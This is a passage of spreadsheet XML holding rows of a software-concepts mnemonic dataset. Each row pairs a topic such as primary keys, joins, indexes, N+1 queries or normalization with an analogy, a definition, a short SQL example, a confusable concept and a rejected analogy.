          <t>A gym full of mannequins in workout clothes: perfectly shaped bodies (data) that cannot lift a single dumbbell; trainers (services) drag their limbs around for them.</t>
        </is>
      </c>
      <c r="E701" t="inlineStr">
        <is>
          <t>A smell where entities are bags of getters and setters and all behavior lives in service classes — OO shape without OO benefits.</t>
        </is>
      </c>
      <c r="F701" t="inlineStr">
        <is>
          <t>OrderService.calcTotal(order) vs order.total() — logic exiled from its data</t>
        </is>
      </c>
      <c r="G701" t="inlineStr">
        <is>
          <t>DTO — DTOs are SUPPOSED to be dumb carriers at boundaries; the smell is DOMAIN objects being that dumb.</t>
        </is>
      </c>
      <c r="H701" t="inlineStr">
        <is>
          <t>Zombie models — rejected, zombies still move themselves; mannequins can't.</t>
        </is>
      </c>
      <c r="J701" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K701" t="inlineStr">
        <is>
          <t>Domain-driven design</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" t="n">
        <v>0</v>
      </c>
      <c r="B702" t="inlineStr">
        <is>
          <t>700</t>
        </is>
      </c>
      <c r="C702" t="inlineStr">
        <is>
          <t>Relational model</t>
        </is>
      </c>
      <c r="D702" t="inlineStr">
        <is>
          <t>A strict cafeteria: every fact sits in a tray with fixed labeled compartments; trays stack into tables, and no compartment may hold two foods.</t>
        </is>
      </c>
      <c r="E702" t="inlineStr">
        <is>
          <t>Data stored as relations: unordered tables of typed rows and named columns, addressed by value, never by position or pointer.</t>
        </is>
      </c>
      <c r="F702" t="inlineStr">
        <is>
          <t>CREATE TABLE users (id INT, name TEXT, city TEXT); / Each row is one fact: (7, 'Ada', 'London') / Rows have no inherent order; queries filter by value</t>
        </is>
      </c>
      <c r="G702" t="inlineStr">
        <is>
          <t>Spreadsheet — sheets address cells by position (B7); relations have no row order or cell coordinates, only values.</t>
        </is>
      </c>
      <c r="H702" t="inlineStr">
        <is>
          <t>Excel-hall of steel tables (too generic office imagery).</t>
        </is>
      </c>
      <c r="J702" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K702" t="inlineStr">
        <is>
          <t>Relational model &amp; SQL</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" t="n">
        <v>0</v>
      </c>
      <c r="B703" t="inlineStr">
        <is>
          <t>701</t>
        </is>
      </c>
      <c r="C703" t="inlineStr">
        <is>
          <t>Primary key</t>
        </is>
      </c>
      <c r="D703" t="inlineStr">
        <is>
          <t>A hotel front desk: every room has exactly one brass key with a number stamped in; no two rooms share a number, and a blank key with no number is refused.</t>
        </is>
      </c>
      <c r="E703" t="inlineStr">
        <is>
          <t>Column(s) that uniquely and non-nullably identify each row; every table should have exactly one.</t>
        </is>
      </c>
      <c r="F703" t="inlineStr">
        <is>
          <t>CREATE TABLE users ( / id BIGINT PRIMARY KEY, / email TEXT);</t>
        </is>
      </c>
      <c r="G703" t="inlineStr">
        <is>
          <t>UNIQUE constraint — UNIQUE allows NULLs and many per table; a PK is unique + NOT NULL and there is only one per table.</t>
        </is>
      </c>
      <c r="H703" t="inlineStr">
        <is>
          <t>Fingerprint scanner at each row's door (less concrete than numbered hotel keys).</t>
        </is>
      </c>
      <c r="J703" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K703" t="inlineStr">
        <is>
          <t>Relational model &amp; SQL</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" t="n">
        <v>0</v>
      </c>
      <c r="B704" t="inlineStr">
        <is>
          <t>702</t>
        </is>
      </c>
      <c r="C704" t="inlineStr">
        <is>
          <t>Foreign key</t>
        </is>
      </c>
      <c r="D704" t="inlineStr">
        <is>
          <t>A restaurant coat-check ticket #88 points to hook #88 in another room; the waiter (constraint) refuses to issue a ticket for a hook that doesn't exist — no orphan tickets.</t>
        </is>
      </c>
      <c r="E704" t="inlineStr">
        <is>
          <t>A column holding another table's primary key value, linking child rows to their parent row.</t>
        </is>
      </c>
      <c r="F704" t="inlineStr">
        <is>
          <t>CREATE TABLE orders ( / id BIGINT PRIMARY KEY, / user_id BIGINT REFERENCES users(id));</t>
        </is>
      </c>
      <c r="G704" t="inlineStr">
        <is>
          <t>Primary key — the PK lives in the parent and is unique; the FK lives in the child, may repeat, and may be NULL.</t>
        </is>
      </c>
      <c r="H704" t="inlineStr">
        <is>
          <t>Library call number pointing to a shelf (weaker orphan-prevention imagery).</t>
        </is>
      </c>
      <c r="J704" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K704" t="inlineStr">
        <is>
          <t>Relational model &amp; SQL</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" t="n">
        <v>0</v>
      </c>
      <c r="B705" t="inlineStr">
        <is>
          <t>703</t>
        </is>
      </c>
      <c r="C705" t="inlineStr">
        <is>
          <t>SELECT FROM WHERE</t>
        </is>
      </c>
      <c r="D705" t="inlineStr">
        <is>
          <t>A fishmonger works right to left: nets the whole lake (FROM), throws back the small fish (WHERE), then fillets only the cuts you ordered (SELECT).</t>
        </is>
      </c>
      <c r="E705" t="inlineStr">
        <is>
          <t>Core query shape: FROM picks tables, WHERE filters rows, SELECT projects columns — logically evaluated in that order.</t>
        </is>
      </c>
      <c r="F705" t="inlineStr">
        <is>
          <t>SELECT name, email / FROM users / WHERE created_at &gt;= '2026-01-01';</t>
        </is>
      </c>
      <c r="G705" t="inlineStr">
        <is>
          <t>Written order vs logical order — you type SELECT first, but the engine runs FROM, then WHERE, then SELECT.</t>
        </is>
      </c>
      <c r="H705" t="inlineStr">
        <is>
          <t>Assembly line with three stations (not distinctive enough to recall).</t>
        </is>
      </c>
      <c r="J705" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K705" t="inlineStr">
        <is>
          <t>Relational model &amp; SQL</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" t="n">
        <v>0</v>
      </c>
      <c r="B706" t="inlineStr">
        <is>
          <t>704</t>
        </is>
      </c>
      <c r="C706" t="inlineStr">
        <is>
          <t>ORDER BY and LIMIT</t>
        </is>
      </c>
      <c r="D706" t="inlineStr">
        <is>
          <t>A podium ceremony: all marathon finishers are lined up by time (ORDER BY), then only the first three climb the podium (LIMIT 3); everyone else goes home unlisted.</t>
        </is>
      </c>
      <c r="E706" t="inlineStr">
        <is>
          <t>ORDER BY sorts the result set; LIMIT (with OFFSET) caps how many of the sorted rows come back.</t>
        </is>
      </c>
      <c r="F706" t="inlineStr">
        <is>
          <t>SELECT name, seconds FROM runners / ORDER BY seconds ASC / LIMIT 3;</t>
        </is>
      </c>
      <c r="G706" t="inlineStr">
        <is>
          <t>GROUP BY — GROUP BY collapses rows into groups; ORDER BY only rearranges them, the row count is unchanged.</t>
        </is>
      </c>
      <c r="H706" t="inlineStr">
        <is>
          <t>Nightclub queue with a rope after three people (podium encodes the sort step better).</t>
        </is>
      </c>
      <c r="J706" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K706" t="inlineStr">
        <is>
          <t>Relational model &amp; SQL</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" t="n">
        <v>0</v>
      </c>
      <c r="B707" t="inlineStr">
        <is>
          <t>705</t>
        </is>
      </c>
      <c r="C707" t="inlineStr">
        <is>
          <t>GROUP BY aggregation</t>
        </is>
      </c>
      <c r="D707" t="inlineStr">
        <is>
          <t>You sort a coin heap into labeled jars, then weigh whole jars. You may report a jar's label or its weight — never one particular coin; it melted into the group.</t>
        </is>
      </c>
      <c r="E707" t="inlineStr">
        <is>
          <t>Collapses rows sharing key values into one row per group, so aggregates (COUNT, SUM, AVG) summarize each group.</t>
        </is>
      </c>
      <c r="F707" t="inlineStr">
        <is>
          <t>SELECT country, COUNT(*), AVG(age) / FROM users / GROUP BY country;</t>
        </is>
      </c>
      <c r="G707" t="inlineStr">
        <is>
          <t>DISTINCT — DISTINCT only dedupes rows; GROUP BY builds groups you can run aggregates over.</t>
        </is>
      </c>
      <c r="H707" t="inlineStr">
        <is>
          <t>Sorting-hat assigning houses (fun but carries no aggregate imagery).</t>
        </is>
      </c>
      <c r="J707" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K707" t="inlineStr">
        <is>
          <t>Relational model &amp; SQL</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" t="n">
        <v>0</v>
      </c>
      <c r="B708" t="inlineStr">
        <is>
          <t>706</t>
        </is>
      </c>
      <c r="C708" t="inlineStr">
        <is>
          <t>HAVING clause</t>
        </is>
      </c>
      <c r="D708" t="inlineStr">
        <is>
          <t>WHERE is the bouncer screening individual coins at the door; HAVING is a second bouncer who weighs the finished jars and tips out any jar under 100 grams.</t>
        </is>
      </c>
      <c r="E708" t="inlineStr">
        <is>
          <t>Filters whole groups after aggregation, so its conditions can use aggregate results; WHERE cannot.</t>
        </is>
      </c>
      <c r="F708" t="inlineStr">
        <is>
          <t>SELECT country, COUNT(*) AS n / FROM users GROUP BY country / HAVING COUNT(*) &gt; 100;</t>
        </is>
      </c>
      <c r="G708" t="inlineStr">
        <is>
          <t>WHERE — WHERE screens individual rows before grouping; HAVING screens completed groups after aggregation.</t>
        </is>
      </c>
      <c r="H708" t="inlineStr">
        <is>
          <t>Airport baggage scale rejecting heavy bags (loses the after-grouping timing).</t>
        </is>
      </c>
      <c r="J708" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K708" t="inlineStr">
        <is>
          <t>Relational model &amp; SQL</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" t="n">
        <v>0</v>
      </c>
      <c r="B709" t="inlineStr">
        <is>
          <t>707</t>
        </is>
      </c>
      <c r="C709" t="inlineStr">
        <is>
          <t>NULL three-valued logic</t>
        </is>
      </c>
      <c r="D709" t="inlineStr">
        <is>
          <t>A masked stranger at the party: asked 'are you Bob?' they shrug (UNKNOWN). Even two masked strangers side by side cannot confirm they are the same person.</t>
        </is>
      </c>
      <c r="E709" t="inlineStr">
        <is>
          <t>NULL means unknown: comparisons involving NULL yield UNKNOWN, so NULL = NULL is not true; test with IS NULL.</t>
        </is>
      </c>
      <c r="F709" t="inlineStr">
        <is>
          <t>SELECT NULL = NULL; -- NULL, not true / SELECT * FROM users WHERE email IS NULL; / WHERE x &lt;&gt; 5 also drops rows where x IS NULL</t>
        </is>
      </c>
      <c r="G709" t="inlineStr">
        <is>
          <t>Zero or empty string — those are known values; NULL is the absence of a value and poisons any comparison to UNKNOWN.</t>
        </is>
      </c>
      <c r="H709" t="inlineStr">
        <is>
          <t>Schrödinger's cell holding both values (wrong: NULL is unknown, not superposed).</t>
        </is>
      </c>
      <c r="J709" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K709" t="inlineStr">
        <is>
          <t>Relational model &amp; SQL</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" t="n">
        <v>0</v>
      </c>
      <c r="B710" t="inlineStr">
        <is>
          <t>708</t>
        </is>
      </c>
      <c r="C710" t="inlineStr">
        <is>
          <t>Set operations</t>
        </is>
      </c>
      <c r="D710" t="inlineStr">
        <is>
          <t>Two families hand in wedding guest lists. UNION merges them and crosses out the duplicate cousin; UNION ALL seats her twice; INTERSECT keeps only names on both lists; EXCEPT strikes everyone the other family invited.</t>
        </is>
      </c>
      <c r="E710" t="inlineStr">
        <is>
          <t>UNION, INTERSECT and EXCEPT combine two queries' rows vertically; UNION dedupes unless you say UNION ALL.</t>
        </is>
      </c>
      <c r="F710" t="inlineStr">
        <is>
          <t>SELECT city FROM stores / UNION / SELECT city FROM suppliers; -- UNION ALL keeps dupes</t>
        </is>
      </c>
      <c r="G710" t="inlineStr">
        <is>
          <t>JOIN — joins glue columns side by side by matching keys; set ops stack rows from column-compatible queries.</t>
        </is>
      </c>
      <c r="H710" t="inlineStr">
        <is>
          <t>Venn-diagram paint mixing (too abstract, no dedup story).</t>
        </is>
      </c>
      <c r="J710" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K710" t="inlineStr">
        <is>
          <t>Relational model &amp; SQL</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" t="n">
        <v>0</v>
      </c>
      <c r="B711" t="inlineStr">
        <is>
          <t>709</t>
        </is>
      </c>
      <c r="C711" t="inlineStr">
        <is>
          <t>Declarative queries</t>
        </is>
      </c>
      <c r="D711" t="inlineStr">
        <is>
          <t>You tell the taxi driver 'the opera house', not turn-by-turn directions; the driver (query planner) knows tonight's traffic and picks the route. EXPLAIN is peeking over his shoulder.</t>
        </is>
      </c>
      <c r="E711" t="inlineStr">
        <is>
          <t>SQL states what result you want; the optimizer chooses how — access paths, join order, and algorithms.</t>
        </is>
      </c>
      <c r="F711" t="inlineStr">
        <is>
          <t>You write: SELECT * FROM users WHERE age &gt; 30 / Planner decides: index scan vs seq scan, / join algorithm, table order</t>
        </is>
      </c>
      <c r="G711" t="inlineStr">
        <is>
          <t>Imperative code — loops spell out every step; declarative queries leave the steps to the planner.</t>
        </is>
      </c>
      <c r="H711" t="inlineStr">
        <is>
          <t>Ordering a meal vs cooking it yourself (overused analogy, low distinctiveness).</t>
        </is>
      </c>
      <c r="J711" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K711" t="inlineStr">
        <is>
          <t>Relational model &amp; SQL</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" t="n">
        <v>0</v>
      </c>
      <c r="B712" t="inlineStr">
        <is>
          <t>710</t>
        </is>
      </c>
      <c r="C712" t="inlineStr">
        <is>
          <t>Inner join</t>
        </is>
      </c>
      <c r="D712" t="inlineStr">
        <is>
          <t>Speed dating night: only couples whose numbers match on both cards leave together into the results room; wallflowers without a match simply go home unrecorded.</t>
        </is>
      </c>
      <c r="E712" t="inlineStr">
        <is>
          <t>Pairs rows from two tables where the join condition matches; rows with no partner appear nowhere in the result.</t>
        </is>
      </c>
      <c r="F712" t="inlineStr">
        <is>
          <t>SELECT o.id, u.name / FROM orders o / JOIN users u ON u.id = o.user_id;</t>
        </is>
      </c>
      <c r="G712" t="inlineStr">
        <is>
          <t>LEFT JOIN — outer joins keep unmatched rows padded with NULLs; inner join silently drops them.</t>
        </is>
      </c>
      <c r="H712" t="inlineStr">
        <is>
          <t>Zipper teeth meshing (doesn't show unmatched rows being dropped).</t>
        </is>
      </c>
      <c r="J712" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K712" t="inlineStr">
        <is>
          <t>Joins, indexes &amp; query performance</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" t="n">
        <v>0</v>
      </c>
      <c r="B713" t="inlineStr">
        <is>
          <t>711</t>
        </is>
      </c>
      <c r="C713" t="inlineStr">
        <is>
          <t>Outer joins</t>
        </is>
      </c>
      <c r="D713" t="inlineStr">
        <is>
          <t>A generous host: every guest from the left list gets a seat even without a date; the missing partners are cardboard cutouts labeled NULL. FULL OUTER seats both walls of wallflowers.</t>
        </is>
      </c>
      <c r="E713" t="inlineStr">
        <is>
          <t>LEFT, RIGHT and FULL joins keep unmatched rows from one or both sides, filling the missing columns with NULL.</t>
        </is>
      </c>
      <c r="F713" t="inlineStr">
        <is>
          <t>SELECT u.name, o.id / FROM users u LEFT JOIN orders o ON o.user_id = u.id; / -- users with no orders show o.id = NULL</t>
        </is>
      </c>
      <c r="G713" t="inlineStr">
        <is>
          <t>Inner join — inner returns only matched pairs; outer preserves the unmatched side(s) with NULL padding.</t>
        </is>
      </c>
      <c r="H713" t="inlineStr">
        <is>
          <t>Noah's ark boarding singles too (muddles which side is preserved).</t>
        </is>
      </c>
      <c r="J713" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K713" t="inlineStr">
        <is>
          <t>Joins, indexes &amp; query performance</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" t="n">
        <v>0</v>
      </c>
      <c r="B714" t="inlineStr">
        <is>
          <t>712</t>
        </is>
      </c>
      <c r="C714" t="inlineStr">
        <is>
          <t>Database index anatomy</t>
        </is>
      </c>
      <c r="D714" t="inlineStr">
        <is>
          <t>The index at the back of a fat textbook: sorted terms with page numbers. You jump 'polymorphism -&gt; p.412' instead of reading 900 pages; the book itself stays unsorted.</t>
        </is>
      </c>
      <c r="E714" t="inlineStr">
        <is>
          <t>A sorted side structure (usually a B-tree) mapping key values to row locations, turning full scans into O(log n) lookups.</t>
        </is>
      </c>
      <c r="F714" t="inlineStr">
        <is>
          <t>CREATE INDEX idx_users_email ON users(email); / SELECT * FROM users WHERE email='a@b.c' / -- descends 3-4 index pages, then fetches the row</t>
        </is>
      </c>
      <c r="G714" t="inlineStr">
        <is>
          <t>Primary key — a logical uniqueness rule (usually backed by an index); an index is the physical lookup structure itself.</t>
        </is>
      </c>
      <c r="H714" t="inlineStr">
        <is>
          <t>Library card catalog drawers (dated; a textbook's back index is more universal).</t>
        </is>
      </c>
      <c r="J714" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K714" t="inlineStr">
        <is>
          <t>Joins, indexes &amp; query performance</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" t="n">
        <v>0</v>
      </c>
      <c r="B715" t="inlineStr">
        <is>
          <t>713</t>
        </is>
      </c>
      <c r="C715" t="inlineStr">
        <is>
          <t>Composite index leftmost prefix</t>
        </is>
      </c>
      <c r="D715" t="inlineStr">
        <is>
          <t>A phone book sorts by last name, then first. Finding 'Smith' or 'Smith, John' is instant; finding every 'John' regardless of surname means reading the entire book.</t>
        </is>
      </c>
      <c r="E715" t="inlineStr">
        <is>
          <t>An index on (a, b) serves filters on a, or on a and b — but not on b alone; column order decides usefulness.</t>
        </is>
      </c>
      <c r="F715" t="inlineStr">
        <is>
          <t>CREATE INDEX ON people (last_name, first_name); / WHERE last_name='Smith' AND first_name='John' -- uses it / WHERE first_name='John' -- cannot</t>
        </is>
      </c>
      <c r="G715" t="inlineStr">
        <is>
          <t>Two single-column indexes — separate indexes can't act as one sorted (a,b) structure; order within one index is what matters.</t>
        </is>
      </c>
      <c r="H715" t="inlineStr">
        <is>
          <t>Dictionary sorted by second letter (negative example, harder to recall).</t>
        </is>
      </c>
      <c r="J715" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K715" t="inlineStr">
        <is>
          <t>Joins, indexes &amp; query performance</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" t="n">
        <v>0</v>
      </c>
      <c r="B716" t="inlineStr">
        <is>
          <t>714</t>
        </is>
      </c>
      <c r="C716" t="inlineStr">
        <is>
          <t>Covering index</t>
        </is>
      </c>
      <c r="D716" t="inlineStr">
        <is>
          <t>The index card already has the whole answer written on its back — the librarian answers from the card drawer without ever walking to the filing cabinet.</t>
        </is>
      </c>
      <c r="E716" t="inlineStr">
        <is>
          <t>An index containing every column a query needs, so the engine answers from the index alone — an index-only scan, no table fetch.</t>
        </is>
      </c>
      <c r="F716" t="inlineStr">
        <is>
          <t>CREATE INDEX ON orders (user_id, status, total); / SELECT status, total FROM orders WHERE user_id = 7; / -- index-only scan: heap never touched</t>
        </is>
      </c>
      <c r="G716" t="inlineStr">
        <is>
          <t>Composite index — composite is about multiple key columns; covering means the query needs nothing beyond the index.</t>
        </is>
      </c>
      <c r="H716" t="inlineStr">
        <is>
          <t>All-inclusive resort wristband (vague link to 'no extra fetch').</t>
        </is>
      </c>
      <c r="J716" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K716" t="inlineStr">
        <is>
          <t>Joins, indexes &amp; query performance</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" t="n">
        <v>0</v>
      </c>
      <c r="B717" t="inlineStr">
        <is>
          <t>715</t>
        </is>
      </c>
      <c r="C717" t="inlineStr">
        <is>
          <t>Selectivity</t>
        </is>
      </c>
      <c r="D717" t="inlineStr">
        <is>
          <t>Searching 'female patients' in a maternity ward — the index shrugs, nearly every row matches. Searching one passport number is a needle the index hands you instantly.</t>
        </is>
      </c>
      <c r="E717" t="inlineStr">
        <is>
          <t>The fraction of rows a predicate keeps; indexes shine when few rows match and lose to full scans when most rows do.</t>
        </is>
      </c>
      <c r="F717" t="inlineStr">
        <is>
          <t>WHERE passport_no='X99' -- 1 of 10M rows: index wins / WHERE active=true -- 80% of rows: / planner picks a seq scan; the index would thrash</t>
        </is>
      </c>
      <c r="G717" t="inlineStr">
        <is>
          <t>Cardinality — cardinality counts distinct values in a column; selectivity is the fraction of rows a specific filter passes.</t>
        </is>
      </c>
      <c r="H717" t="inlineStr">
        <is>
          <t>Panning for gold vs scooping sand (loses the 'index useless when common' half).</t>
        </is>
      </c>
      <c r="J717" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K717" t="inlineStr">
        <is>
          <t>Joins, indexes &amp; query performance</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" t="n">
        <v>0</v>
      </c>
      <c r="B718" t="inlineStr">
        <is>
          <t>716</t>
        </is>
      </c>
      <c r="C718" t="inlineStr">
        <is>
          <t>EXPLAIN query plan</t>
        </is>
      </c>
      <c r="D718" t="inlineStr">
        <is>
          <t>X-ray glasses for your query: put them on and its skeleton appears — a fat Seq Scan femur right where you swore an index lived.</t>
        </is>
      </c>
      <c r="E718" t="inlineStr">
        <is>
          <t>Shows the optimizer's chosen plan — scans, join order and algorithms, row estimates; the ANALYZE variant executes and adds real numbers.</t>
        </is>
      </c>
      <c r="F718" t="inlineStr">
        <is>
          <t>EXPLAIN ANALYZE SELECT * FROM orders WHERE user_id=7; / Seq Scan on orders (cost=0.00..4582 rows=98750) / -- no index used; estimates vs actuals visible</t>
        </is>
      </c>
      <c r="G718" t="inlineStr">
        <is>
          <t>EXPLAIN vs EXPLAIN ANALYZE — plain EXPLAIN only estimates; ANALYZE really runs the query and reports true times and row counts.</t>
        </is>
      </c>
      <c r="H718" t="inlineStr">
        <is>
          <t>Fortune teller predicting the query's path (planner is deterministic, not mystical).</t>
        </is>
      </c>
      <c r="J718" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K718" t="inlineStr">
        <is>
          <t>Joins, indexes &amp; query performance</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" t="n">
        <v>0</v>
      </c>
      <c r="B719" t="inlineStr">
        <is>
          <t>717</t>
        </is>
      </c>
      <c r="C719" t="inlineStr">
        <is>
          <t>Indexes tax writes</t>
        </is>
      </c>
      <c r="D719" t="inlineStr">
        <is>
          <t>An author with twelve secretaries: each sentence he writes, all twelve re-file cards in their own catalogs. A thirteenth catalog makes lookups snappier and his pen heavier.</t>
        </is>
      </c>
      <c r="E719" t="inlineStr">
        <is>
          <t>Every INSERT, UPDATE or DELETE must also maintain each index on the table, so each extra index slows every write.</t>
        </is>
      </c>
      <c r="F719" t="inlineStr">
        <is>
          <t>Table with 6 indexes: / one INSERT = 1 heap write + 6 index updates / Bulk-load trick: drop indexes, load, rebuild</t>
        </is>
      </c>
      <c r="G719" t="inlineStr">
        <is>
          <t>'Indexes always help' — they help the reads that use them; every write pays for all of them whether used or not.</t>
        </is>
      </c>
      <c r="H719" t="inlineStr">
        <is>
          <t>Toll booths on the write highway (doesn't scale visually with index count).</t>
        </is>
      </c>
      <c r="J719" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K719" t="inlineStr">
        <is>
          <t>Joins, indexes &amp; query performance</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" t="n">
        <v>0</v>
      </c>
      <c r="B720" t="inlineStr">
        <is>
          <t>718</t>
        </is>
      </c>
      <c r="C720" t="inlineStr">
        <is>
          <t>N+1 query problem</t>
        </is>
      </c>
      <c r="D720" t="inlineStr">
        <is>
          <t>A waiter takes a 30-guest table's order, then makes thirty separate sprints to the bar, one drink per trip, instead of one loaded tray. The kitchen is fine; the hallway is the bottleneck.</t>
        </is>
      </c>
      <c r="E720" t="inlineStr">
        <is>
          <t>Code fetches a list with one query, then loops issuing one query per item — N+1 round trips instead of one join or batched query.</t>
        </is>
      </c>
      <c r="F720" t="inlineStr">
        <is>
          <t>users = q('SELECT * FROM users') # 1 / for u in users: / q('SELECT * FROM orders WHERE user_id=%s', u.id) # +N</t>
        </is>
      </c>
      <c r="G720" t="inlineStr">
        <is>
          <t>Slow query from a missing index — each N+1 query may be fast; the killer is round-trip count, fixed by eager loading or IN-batching, not an index.</t>
        </is>
      </c>
      <c r="H720" t="inlineStr">
        <is>
          <t>Woodpecker pecking one hole per seed (less tied to request/response trips).</t>
        </is>
      </c>
      <c r="J720" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K720" t="inlineStr">
        <is>
          <t>Joins, indexes &amp; query performance</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" t="n">
        <v>0</v>
      </c>
      <c r="B721" t="inlineStr">
        <is>
          <t>719</t>
        </is>
      </c>
      <c r="C721" t="inlineStr">
        <is>
          <t>Join algorithms</t>
        </is>
      </c>
      <c r="D721" t="inlineStr">
        <is>
          <t>Pairing socks three ways: hold each sock against every other (nested loop); toss them into color bins and match within bins (hash); or sort both piles and zip down them in step (merge).</t>
        </is>
      </c>
      <c r="E721" t="inlineStr">
        <is>
          <t>Engines match rows via nested loop (small or indexed inner), hash join (big unsorted inputs), or merge join (both inputs sorted).</t>
        </is>
      </c>
      <c r="F721" t="inlineStr">
        <is>
          <t>Nested loop: outer 10 rows, inner has index / Hash: build hash of small table, probe with big / Merge: both sorted on key, single zip pass</t>
        </is>
      </c>
      <c r="G721" t="inlineStr">
        <is>
          <t>Join types (INNER/LEFT) — types define which rows belong in the result; algorithms only define how the engine finds them.</t>
        </is>
      </c>
      <c r="H721" t="inlineStr">
        <is>
          <t>Speed dating vs name-tag tables (speed dating already anchors inner join).</t>
        </is>
      </c>
      <c r="J721" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K721" t="inlineStr">
        <is>
          <t>Joins, indexes &amp; query performance</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" t="n">
        <v>0</v>
      </c>
      <c r="B722" t="inlineStr">
        <is>
          <t>720</t>
        </is>
      </c>
      <c r="C722" t="inlineStr">
        <is>
          <t>Normalization</t>
        </is>
      </c>
      <c r="D722" t="inlineStr">
        <is>
          <t>Marie Kondo for data: every fact gets exactly one drawer; a duplicated fact sparks no joy and is folded away into its own table, leaving a key behind as the receipt.</t>
        </is>
      </c>
      <c r="E722" t="inlineStr">
        <is>
          <t>Structuring tables so every fact is stored exactly once, removing redundancy by decomposing along functional dependencies.</t>
        </is>
      </c>
      <c r="F722" t="inlineStr">
        <is>
          <t>Instead of orders repeating user_name, user_addr: / users(id, name, addr) + orders(id, user_id) / Address change: 1 row, not 400</t>
        </is>
      </c>
      <c r="G722" t="inlineStr">
        <is>
          <t>Denormalization — the deliberate reverse: reintroducing duplication for read speed once you know the cost.</t>
        </is>
      </c>
      <c r="H722" t="inlineStr">
        <is>
          <t>Prime factorization of tables (mathy, not sensory).</t>
        </is>
      </c>
      <c r="J722" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K722" t="inlineStr">
        <is>
          <t>Schema design &amp; normalization</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" t="n">
        <v>0</v>
      </c>
      <c r="B723" t="inlineStr">
        <is>
          <t>721</t>
        </is>
      </c>
      <c r="C723" t="inlineStr">
        <is>
          <t>Modification anomalies</t>
        </is>
      </c>
      <c r="D723" t="inlineStr">
        <is>
          <t>The teacher's address is copied onto all 30 student cards. She moves and one card is missed (update); a teacher with no students can't be stored anywhere (insert); the last student leaves and her address is shredded with the card (delete).</t>
        </is>
      </c>
      <c r="E723" t="inlineStr">
        <is>
          <t>Redundancy breeds update anomalies (miss one copy), insert anomalies (fact needs a host row), and delete anomalies (fact dies with its row).</t>
        </is>
      </c>
      <c r="F723" t="inlineStr">
        <is>
          <t>employees(name, dept, dept_phone): / phone changes -&gt; update 40 rows, miss 1 -&gt; two truths / delete last employee -&gt; dept phone vanishes</t>
        </is>
      </c>
      <c r="G723" t="inlineStr">
        <is>
          <t>Concurrency anomalies (dirty/phantom reads) — those come from parallel transactions; these come from redundant schema design.</t>
        </is>
      </c>
      <c r="H723" t="inlineStr">
        <is>
          <t>Hydra heads regrowing wrong info (monster imagery too vague on mechanism).</t>
        </is>
      </c>
      <c r="J723" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K723" t="inlineStr">
        <is>
          <t>Schema design &amp; normalization</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" t="n">
        <v>0</v>
      </c>
      <c r="B724" t="inlineStr">
        <is>
          <t>722</t>
        </is>
      </c>
      <c r="C724" t="inlineStr">
        <is>
          <t>First normal form</t>
        </is>
      </c>
      <c r="D724" t="inlineStr">
        <is>
          <t>One egg per carton cup. Someone crammed three phone numbers into one cup; the lid won't close until each egg gets its own cup — or its own carton row.</t>
        </is>
      </c>
      <c r="E724" t="inlineStr">
        <is>
          <t>Every column holds one atomic value per row — no arrays, comma lists, or repeating groups; multi-values become extra rows.</t>
        </is>
      </c>
      <c r="F724" t="inlineStr">
        <is>
          <t>Bad: phones = '555-1, 555-2, 555-3' / Good: user_phones(user_id, phone) / one row per number</t>
